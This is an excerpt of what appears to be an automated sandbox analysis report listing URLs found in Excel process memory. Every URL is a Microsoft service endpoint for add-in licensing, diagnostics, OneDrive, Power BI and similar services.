    Source: EXCEL.EXE, 00000001.00000002.754987472.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620691632.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.624148832.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564561059.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.602315328.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599159898.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.292051604.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.659948937.0000000012BE9000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289358432.0000000012C05000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660814670.0000000012BF8000.00000004.00000001.sdmpString found in binary or memory: https://addinsinstallation.store.office.com/appinstall/unauthenticatedTV
    Source: EXCEL.EXE, 3B184E9E-87D6-40D5-A02C-4CE115A663F4.1.drString found in binary or memory: https://addinslicensing.store.office.com/commerce/query
    Source: EXCEL.EXE, 00000001.00000003.289415064.0000000012BD6000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289286361.0000000012B76000.00000004.00000001.sdmpString found in binary or memory: https://addinslicensing.store.office.com/commerce/queryDeepLinkingServicehttps://api.addins.store.of
    Source: EXCEL.EXE, 00000001.00000002.754987472.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620691632.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.624148832.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564561059.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.602315328.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599159898.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.292051604.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.659948937.0000000012BE9000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289358432.0000000012C05000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660814670.0000000012BF8000.00000004.00000001.sdmpString found in binary or memory: https://addinslicensing.store.office.com/commerce/queryt
    Source: EXCEL.EXE, EXCEL.EXE, 00000001.00000002.754987472.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620691632.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.624148832.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564561059.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.602315328.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599159898.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.292051604.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.659948937.0000000012BE9000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289358432.0000000012C05000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660814670.0000000012BF8000.00000004.00000001.sdmp, 3B184E9E-87D6-40D5-A02C-4CE115A663F4.1.drString found in binary or memory: https://addinslicensing.store.office.com/entitlement/query
    Source: EXCEL.EXE, EXCEL.EXE, 00000001.00000002.754583225.0000000012A70000.00000004.00000001.sdmp, 3B184E9E-87D6-40D5-A02C-4CE115A663F4.1.drString found in binary or memory: https://addinslicensing.store.office.com/orgid/apps/remove
    Source: EXCEL.EXE, 00000001.00000002.754987472.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620691632.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.624148832.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564561059.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.602315328.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599159898.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.292051604.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.659948937.0000000012BE9000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289358432.0000000012C05000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660814670.0000000012BF8000.00000004.00000001.sdmpString found in binary or memory: https://addinslicensing.store.office.com/orgid/apps/remove5F
    Source: EXCEL.EXE, 00000001.00000002.754987472.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620691632.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.624148832.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564561059.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.602315328.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599159898.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.292051604.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.659948937.0000000012BE9000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289358432.0000000012C05000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660814670.0000000012BF8000.00000004.00000001.sdmpString found in binary or memory: https://addinslicensing.store.office.com/orgid/apps/remove6
    Source: EXCEL.EXE, 00000001.00000003.289415064.0000000012BD6000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289286361.0000000012B76000.00000004.00000001.sdmpString found in binary or memory: https://addinslicensing.store.office.com/orgid/apps/removeBearer
    Source: EXCEL.EXE, 3B184E9E-87D6-40D5-A02C-4CE115A663F4.1.drString found in binary or memory: https://addinslicensing.store.office.com/orgid/entitlement/query
    Source: EXCEL.EXE, 00000001.00000003.289415064.0000000012BD6000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289286361.0000000012B76000.00000004.00000001.sdmpString found in binary or memory: https://addinslicensing.store.office.com/orgid/entitlement/queryBearer
    Source: EXCEL.EXE, 00000001.00000002.754987472.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620691632.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.624148832.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564561059.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.602315328.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599159898.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.292051604.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.659948937.0000000012BE9000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289358432.0000000012C05000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660814670.0000000012BF8000.00000004.00000001.sdmpString found in binary or memory: https://addinslicensing.store.office.com/orgid/entitlement/queryKV
    Source: EXCEL.EXE, 00000001.00000003.660814670.0000000012BF8000.00000004.00000001.sdmp, 3B184E9E-87D6-40D5-A02C-4CE115A663F4.1.drString found in binary or memory: https://analysis.windows.net/powerbi/api
    Source: EXCEL.EXE, 00000001.00000002.754987472.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620691632.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.624148832.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564561059.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.602315328.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599159898.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.292051604.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.659948937.0000000012BE9000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289358432.0000000012C05000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660814670.0000000012BF8000.00000004.00000001.sdmpString found in binary or memory: https://analysis.windows.net/powerbi/api.;
    Source: EXCEL.EXE, EXCEL.EXE, 00000001.00000002.754897882.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660254465.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.738795485.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.601531308.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289286361.0000000012B76000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620631853.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599092509.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.291961394.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564407313.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.623747505.0000000012B6C000.00000004.00000001.sdmp, 3B184E9E-87D6-40D5-A02C-4CE115A663F4.1.drString found in binary or memory: https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
    Source: EXCEL.EXE, 00000001.00000003.289286361.0000000012B76000.00000004.00000001.sdmpString found in binary or memory: https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeechBearer
    Source: EXCEL.EXE, 00000001.00000002.754897882.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660254465.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.738795485.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.601531308.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289286361.0000000012B76000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620631853.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599092509.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.291961394.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564407313.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.623747505.0000000012B6C000.00000004.00000001.sdmpString found in binary or memory: https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeechfe
    Source: EXCEL.EXE, EXCEL.EXE, 00000001.00000002.754987472.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620691632.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.624148832.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564561059.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.602315328.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599159898.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.292051604.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.659948937.0000000012BE9000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289358432.0000000012C05000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660814670.0000000012BF8000.00000004.00000001.sdmp, 3B184E9E-87D6-40D5-A02C-4CE115A663F4.1.drString found in binary or memory: https://api.aadrm.com
    Source: EXCEL.EXE, 3B184E9E-87D6-40D5-A02C-4CE115A663F4.1.drString found in binary or memory: https://api.aadrm.com/
    Source: EXCEL.EXE, 00000001.00000002.754987472.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620691632.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.624148832.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564561059.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.602315328.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599159898.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.292051604.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.659948937.0000000012BE9000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289358432.0000000012C05000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660814670.0000000012BF8000.00000004.00000001.sdmpString found in binary or memory: https://api.aadrm.com/Ru
    Source: EXCEL.EXE, EXCEL.EXE, 00000001.00000002.754987472.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620691632.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.624148832.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564561059.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.602315328.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599159898.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.292051604.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.659948937.0000000012BE9000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289358432.0000000012C05000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660814670.0000000012BF8000.00000004.00000001.sdmp, 3B184E9E-87D6-40D5-A02C-4CE115A663F4.1.drString found in binary or memory: https://api.addins.omex.office.net/appinfo/query
    Source: EXCEL.EXE, EXCEL.EXE, 00000001.00000002.754987472.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620691632.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.624148832.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564561059.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.602315328.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599159898.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.292051604.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.659948937.0000000012BE9000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289358432.0000000012C05000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660814670.0000000012BF8000.00000004.00000001.sdmp, 3B184E9E-87D6-40D5-A02C-4CE115A663F4.1.drString found in binary or memory: https://api.addins.omex.office.net/appstate/query
    Source: EXCEL.EXE, 3B184E9E-87D6-40D5-A02C-4CE115A663F4.1.drString found in binary or memory: https://api.addins.store.office.com/addinstemplate
    Source: EXCEL.EXE, 00000001.00000002.754987472.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620691632.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.624148832.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564561059.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.602315328.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599159898.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.292051604.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.659948937.0000000012BE9000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289358432.0000000012C05000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660814670.0000000012BF8000.00000004.00000001.sdmpString found in binary or memory: https://api.addins.store.office.com/addinstemplateg
    Source: EXCEL.EXE, 3B184E9E-87D6-40D5-A02C-4CE115A663F4.1.drString found in binary or memory: https://api.addins.store.office.com/app/query
    Source: EXCEL.EXE, 00000001.00000002.754987472.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620691632.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.624148832.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564561059.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.602315328.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599159898.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.292051604.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.659948937.0000000012BE9000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289358432.0000000012C05000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660814670.0000000012BF8000.00000004.00000001.sdmpString found in binary or memory: https://api.addins.store.office.com/app/query$j
    Source: EXCEL.EXE, 00000001.00000003.289415064.0000000012BD6000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289286361.0000000012B76000.00000004.00000001.sdmpString found in binary or memory: https://api.addins.store.office.com/app/queryAppStateQuery15https://api.addins.omex.office.net/appst
    Source: EXCEL.EXE, 3B184E9E-87D6-40D5-A02C-4CE115A663F4.1.drString found in binary or memory: https://api.addins.store.officeppe.com/addinstemplate
    Source: EXCEL.EXE, 00000001.00000002.754987472.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620691632.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.624148832.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564561059.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.602315328.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599159898.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.292051604.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.659948937.0000000012BE9000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289358432.0000000012C05000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660814670.0000000012BF8000.00000004.00000001.sdmpString found in binary or memory: https://api.addins.store.officeppe.com/addinstemplateL
    Source: 3B184E9E-87D6-40D5-A02C-4CE115A663F4.1.drString found in binary or memory: https://api.cortana.ai
    Source: EXCEL.EXE, 00000001.00000003.289286361.0000000012B76000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289477836.0000000012BBE000.00000004.00000001.sdmpString found in binary or memory: https://api.cortana.aiBearer
    Source: EXCEL.EXE, 00000001.00000003.289286361.0000000012B76000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289477836.0000000012BBE000.00000004.00000001.sdmpString found in binary or memory: https://api.cortana.aihttps://login.windows.net/common/oauth2/authorize
    Source: 3B184E9E-87D6-40D5-A02C-4CE115A663F4.1.drString found in binary or memory: https://api.diagnostics.office.com
    Source: EXCEL.EXE, 00000001.00000003.289286361.0000000012B76000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289477836.0000000012BBE000.00000004.00000001.sdmpString found in binary or memory: https://api.diagnostics.office.comBearer
    Source: EXCEL.EXE, 00000001.00000003.289286361.0000000012B76000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289477836.0000000012BBE000.00000004.00000001.sdmpString found in binary or memory: https://api.diagnostics.office.comhttps://login.windows.net/common/oauth2/authorize
    Source: EXCEL.EXE, 00000001.00000002.754987472.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620691632.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.624148832.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564561059.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.602315328.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599159898.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.292051604.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.659948937.0000000012BE9000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289358432.0000000012C05000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660814670.0000000012BF8000.00000004.00000001.sdmpString found in binary or memory: https://api.diagnostics.office.comom
    Source: EXCEL.EXE, EXCEL.EXE, 00000001.00000002.754987472.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620691632.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.624148832.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564561059.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.602315328.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599159898.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.292051604.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.659948937.0000000012BE9000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289358432.0000000012C05000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660814670.0000000012BF8000.00000004.00000001.sdmp, 3B184E9E-87D6-40D5-A02C-4CE115A663F4.1.drString found in binary or memory: https://api.diagnosticssdf.office.com
    Source: EXCEL.EXE, EXCEL.EXE, 00000001.00000002.754583225.0000000012A70000.00000004.00000001.sdmp, 3B184E9E-87D6-40D5-A02C-4CE115A663F4.1.drString found in binary or memory: https://api.microsoftstream.com/api/
    Source: EXCEL.EXE, 00000001.00000002.754987472.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620691632.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.624148832.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564561059.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.602315328.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599159898.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.292051604.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.659948937.0000000012BE9000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289358432.0000000012C05000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660814670.0000000012BF8000.00000004.00000001.sdmpString found in binary or memory: https://api.microsoftstream.com/api/ntV
    Source: 3B184E9E-87D6-40D5-A02C-4CE115A663F4.1.drString found in binary or memory: https://api.office.net
    Source: EXCEL.EXE, 00000001.00000002.754987472.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620691632.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.624148832.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564561059.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.602315328.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599159898.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.292051604.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.659948937.0000000012BE9000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289358432.0000000012C05000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660814670.0000000012BF8000.00000004.00000001.sdmpString found in binary or memory: https://api.office.net$
    Source: EXCEL.EXE, 00000001.00000002.754987472.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620691632.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.624148832.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564561059.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.602315328.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599159898.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.292051604.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.659948937.0000000012BE9000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289358432.0000000012C05000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660814670.0000000012BF8000.00000004.00000001.sdmpString found in binary or memory: https://api.office.netg
    Source: EXCEL.EXE, 00000001.00000002.754987472.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620691632.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.624148832.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564561059.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.602315328.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599159898.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.292051604.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.659948937.0000000012BE9000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289358432.0000000012C05000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660814670.0000000012BF8000.00000004.00000001.sdmpString found in binary or memory: https://api.office.netm
    Source: EXCEL.EXE, 00000001.00000002.754987472.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620691632.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.624148832.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564561059.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.602315328.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599159898.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.292051604.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.659948937.0000000012BE9000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289358432.0000000012C05000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660814670.0000000012BF8000.00000004.00000001.sdmpString found in binary or memory: https://api.office.netn
    Source: EXCEL.EXE, 00000001.00000002.754987472.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620691632.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.624148832.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564561059.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.602315328.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599159898.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.292051604.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.659948937.0000000012BE9000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289358432.0000000012C05000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660814670.0000000012BF8000.00000004.00000001.sdmpString found in binary or memory: https://api.office.netr
    Source: EXCEL.EXE, EXCEL.EXE, 00000001.00000002.754987472.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620691632.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.624148832.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564561059.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.602315328.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599159898.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.292051604.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.659948937.0000000012BE9000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289358432.0000000012C05000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660814670.0000000012BF8000.00000004.00000001.sdmp, 3B184E9E-87D6-40D5-A02C-4CE115A663F4.1.drString found in binary or memory: https://api.onedrive.com
    Source: EXCEL.EXE, EXCEL.EXE, 00000001.00000002.754583225.0000000012A70000.00000004.00000001.sdmp, 3B184E9E-87D6-40D5-A02C-4CE115A663F4.1.drString found in binary or memory: https://api.powerbi.com/beta/myorg/imports
